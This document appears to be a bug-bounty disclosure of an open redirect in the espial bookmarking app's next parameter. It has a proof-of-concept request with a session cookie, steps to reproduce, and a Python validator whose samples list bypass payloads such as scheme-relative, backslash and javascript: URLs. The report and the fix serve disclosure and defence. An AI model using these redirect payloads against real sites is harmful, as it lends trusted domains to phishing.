Open Redirect in jonschoning/espial
Valid
Reported on Sep 25th 2021
Description
Open redirect on the /add page via the next= query parameter: the value of next is used as the post-submit redirect target without being restricted to locations within the application, so it can point to an arbitrary external site.
Proof of Concept
// PoC.request
POST /api/add HTTP/2
Host: esp.ae8.org
Cookie: _SESSION=t0+3lyA0gi4m/WOulD20ZJpY+2nW6ePHcVdc+I8Q+XV5W2b9qkCTm9/L9zYKNYg+rG7YmGyRg7SSZnGGG8NcZlrvXly7uPAUFtXaU+NzgjFoAwV8VSKA6KjB3JKwVxarCcSfW519/RjCDJJpq0ZBguQqPm4qF+dbAdIzAiP5XogmlVajF+8k9+UqxvpbGkZ6e3VGBdhOi44wL/AfySUfkxpro+yEVfeeBrLi3wefGrt4/SyZYivwQql8QocZQ/J2+p5UegTvYByqQlD8obT1p4BrmFecBq07y1KGpXDw+u76m4zF3NPw2pUJVKMD1rolqu3r+c/Z7htvP4A=; XSRF-TOKEN=rK2UKn5OcYHo0nsPw8jOP5YR99BDb84wsCXxyaQ0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Xsrf-Token: rK2UKn5OcYHo0nsPw8jOP5YR99BDb84wsCXxyaQ0
Content-Type: application/json
Content-Length: 183
Origin: https://esp.ae8.org
Referer: https://esp.ae8.org/add?next=https://google.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
{"url":"http://test.com","toread":null,"title":"Home - Test.com","time":null,"tags":null,"slug":null,"selected":null,"private":false,"description":"test","bid":null,"archiveUrl":null}
Steps to Reproduce
Open the add page with next set to an external site: https://esp.ae8.org/add?next=https://google.com
Fill in and submit the form (the POST /api/add request shown above). After the bookmark is created successfully, the application redirects the browser to google.com.
Impact
The next parameter is not restricted to relative URLs within the application, so an attacker can craft an /add link on the trusted esp.ae8.org domain that, once the victim saves the bookmark, sends them to an attacker-controlled site. Because the journey starts on a legitimate domain, the victim may believe the destination they were redirected to is also legitimate, which lends credibility to phishing pages.
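The check below restricts a next value to the application's own origin, the mitigation this report's impact statement calls for. It is an added example in Python and not code from the espial project; the application origin https://esp.ae8.org, the fallback path / and the function name safe_next are assumptions. It goes beyond the single https://google.com payload in the report and also rejects the scheme-relative (//host), backslash (/\host), credential-prefix (origin@host) and javascript: variants that commonly bypass naive open-redirect fixes.

```python
"""Hardened handling of a `next` redirect parameter.

Added example, not espial's code. Assumes a hypothetical handler that
receives the raw `next` query value and must pick where to send the
browser after a bookmark is created. APP_ORIGIN and DEFAULT_NEXT are
assumptions for this example.
"""
from urllib.parse import urlsplit, urlunsplit

APP_ORIGIN = "https://esp.ae8.org"  # assumption: the deployment's own origin
DEFAULT_NEXT = "/"                  # assumption: landing page if `next` is rejected


def safe_next(raw_next, app_origin=APP_ORIGIN, default=DEFAULT_NEXT):
    """Return a redirect target that cannot leave the application's origin.

    Accepted (returned as a path-only URL, so the browser resolves it
    against the page it is already on):
      * a path such as "/?tag=haskell"
      * an absolute URL whose scheme and host exactly match app_origin
    Rejected (returns `default`):
      * absolute URLs to other hosts, e.g. https://google.com
      * scheme-relative URLs (//evil.example) and backslash forms (/\\evil.example)
      * hosts that merely start with ours (esp.ae8.org.evil.example, esp.ae8.org@evil.example)
      * non-http(s) schemes such as javascript: or data:
      * empty values or values containing control characters
    """
    if not raw_next:
        return default
    raw_next = raw_next.strip()
    if not raw_next or not raw_next.isprintable():
        # CR/LF or other control characters have no place in a redirect target.
        return default

    # Browsers treat "\" like "/" when parsing the authority, so normalise
    # first: "/\evil.example" becomes "//evil.example" and is caught below.
    candidate = raw_next.replace("\\", "/")
    parts = urlsplit(candidate)
    app = urlsplit(app_origin)

    if parts.scheme or parts.netloc:
        # Absolute or scheme-relative: only an exact match of our origin passes.
        if parts.scheme.lower() != app.scheme.lower():
            return default
        if parts.netloc.lower() != app.netloc.lower():
            return default
        path = parts.path or "/"
    else:
        path = parts.path

    # Require a single leading slash. "//..." would be re-read by the browser
    # as scheme-relative and "relative/path" is ambiguous, so both are refused.
    if not path.startswith("/") or path.startswith("//"):
        return default

    # Emit scheme- and host-less so the result can only ever be same-origin.
    return urlunsplit(("", "", path, parts.query, ""))


if __name__ == "__main__":
    # Constructed sample payloads, including the one from the report.
    for sample in ["https://google.com", "//google.com", "/\\google.com",
                   "javascript:alert(1)", "https://esp.ae8.org/?tag=haskell",
                   "/?tag=haskell", "https://esp.ae8.org.evil.example/"]:
        print(f"{sample!r:45} -> {safe_next(sample)!r}")
```

The key design choice is to never echo the caller's scheme or host back: even an accepted same-origin absolute URL is reduced to its path and query, so a host comparison bug can at worst produce a wrong local path, not a redirect off-site.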
We have contacted a member of the jonschoning/espial team and are waiting to hear back
The fix bounty has been dropped
This vulnerability will not receive a CVE